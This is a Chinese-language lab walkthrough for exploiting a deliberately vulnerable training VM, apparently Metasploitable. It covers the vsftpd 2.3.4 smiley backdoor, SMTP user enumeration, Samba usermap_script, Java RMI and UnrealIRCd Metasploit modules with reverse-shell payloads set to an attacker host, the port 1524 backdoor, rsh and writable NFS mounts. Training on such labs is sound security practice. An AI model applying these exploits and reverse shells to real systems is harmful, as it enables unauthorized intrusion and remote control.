靶机:https://pan.baidu.com/s/10VnGGir_tV0Aewv_xdjc8w 提取码:3gm0
用户名:msfadmin
密码:msfadmin
端口号 | 漏洞 |
21 | 笑脸漏洞 |
25 | 用户名枚举 |
139,445 | SMB |
512,513,514 | RSH系列 |
1099 | java反序列化 |
1524 | 后门端口 |
2049 | nsf文件共享 |
6667 | IRC |
VSFTP2.3.4
nmap扫描发现ftp版本为2.3.4,笑脸漏洞
方法一:
ftp登陆后连6200端口
还未进行ftp登陆时,6200端口是关闭的
现在进行ftp登录,在用户名后面加一个:)即可,密码任意
登陆后,再开启一个终端窗口,扫描6200端口是否开启
此时的6200端口已经开启,nc直接连接就行
方法二:
msfconsole
搜索vsftp,并使用此模块
exploit/unix/ftp/vsftpd_234_backdoor
配置相关参数
set rhost 目标IP
直接run
smtp用户名列举
进行用户列举前需要了解一点smtp
命令:
VRFY #验证指定用户是否存在,因安全原因常被禁止
MAIL FROM # 命令中指定的地址是发件人地址
RCPT TO # 标识单个的邮件接收人;可有多个 RCPT TO;常在 MAIL 命令后面
状态码:
250 #操作完成
550 #未完成
方法一:
手动使用VRFY,MAIL FROM,RCPT TO命令来进行用户名枚举
VRFY:
MAIL FROM+RCPT TO相结合使用:
方法二:
使用工具smtp-user-enum
安装工具:sudo apt-get install smtp-user-enum
相关选项
-m <number> 最大线程数(默认: 5)
-M <mode> 使用方法方式 EXPN, VRFY or RCPT (默认: VRFY)
-u <user> 指定用户
-f <addr> 邮箱地址,只能用在 "RCPT TO" mode (默认: user@example.com)
-D <domaim> 使用电子邮件地址添加到用户列表在域 (默认: none)使用邮箱代替用户名
-U <file> 通过smtp服务指定文件里的用户名检查
-t <host> 指定主机来运行smtp服务器主机服务
-T <file> 指定文件来运行smtp服务器主机服务
-p <port> 设置TCP端口号 (默认: 25)
-d 调试
-w 最大返回时间 (default: 5)
-v 版本
-h 帮助
方法三:
msfconsole
auxiliary/scanner/smtp/smtp_enum模块
set rhost 目标ip
配置好相关参数后run
等待爆破后获取用户名
SMB
SMB是用于windows,linux上的共享文件和打印机的通信协议
通过nmpa扫描我们发现,正在运行的SMB版本是3.x-4.x
可以使用
exploit/multi/samba/usermap_script模块进行渗透攻击
配置payload
这里使用linux的基础反向攻击即可
show payloads
set payload cmd/unix/reverse
配置相关配置
set rhost 目标ip
set lhost 攻击机ip
直接run即可
445端口也可
RLOGIN/RSH
rsh系列:在系统之后被错误配置从而允许远程访问者从任何地方访问
nmap扫描出512,513,514端口
使用这三个端口需要使用到rsh客户端
apt-get install rsh-client
rlogin
rsh
java RMI
Java RMI:Java远程方法调用,它是一种机制,允许一个Java虚拟机中的对象去访问和调用另一个Java虚拟机中包含的方法
nmap扫描出来1099端口
可以先使用msf中的扫描模块,扫描一下是否存在漏洞
auxiliary/scanner/misc/java_rmi_server
扫描结果表示,该靶机存在java_rmi漏洞
确定其存在漏洞后,使用攻击模块
exploit/multi/misc/java_rmi_server
配置相关参数
set rhost 目标ip
set lhost 攻击机ip
成功拿到shell
Ingreslock1524端口后门漏洞
nmap扫描到1524端口
判断其是一个后门端口
telnet登录即可
telnet 目标ip 1524
nfs文件共享
NFS是基于UDP/IP协议的应用,其实现主要是采用远程过程调用RPC机制,RPC提供了一组与机器、操作系统以及低层传送协议无关的存取远程文件的操作。
nmap扫描到2049端口,是nfs服务
使用nfs服务获取靶机的共享文件
获取到共享文件
新创建一个文件夹为tmp1,并将获取到的文件挂载到tmp1中
进入到tmp1中即可查看挂载的文件,不仅可以查看挂载的文件,同时还可以向里面写入文件
IRC漏洞
IRC:当pc上使用irc的客户端连接到服务端上,即可实现实时聊天
nmap扫描到6667端口
msf中使用exploit/unix/irc/unreal_ircd_3281_backdoor模块
设置payload为linux的反向链接
set payload cmd/unix/reverse
配置目标对象和监听对象
set rhost 目标ip
set lhost 攻击机ip
设置好了直接run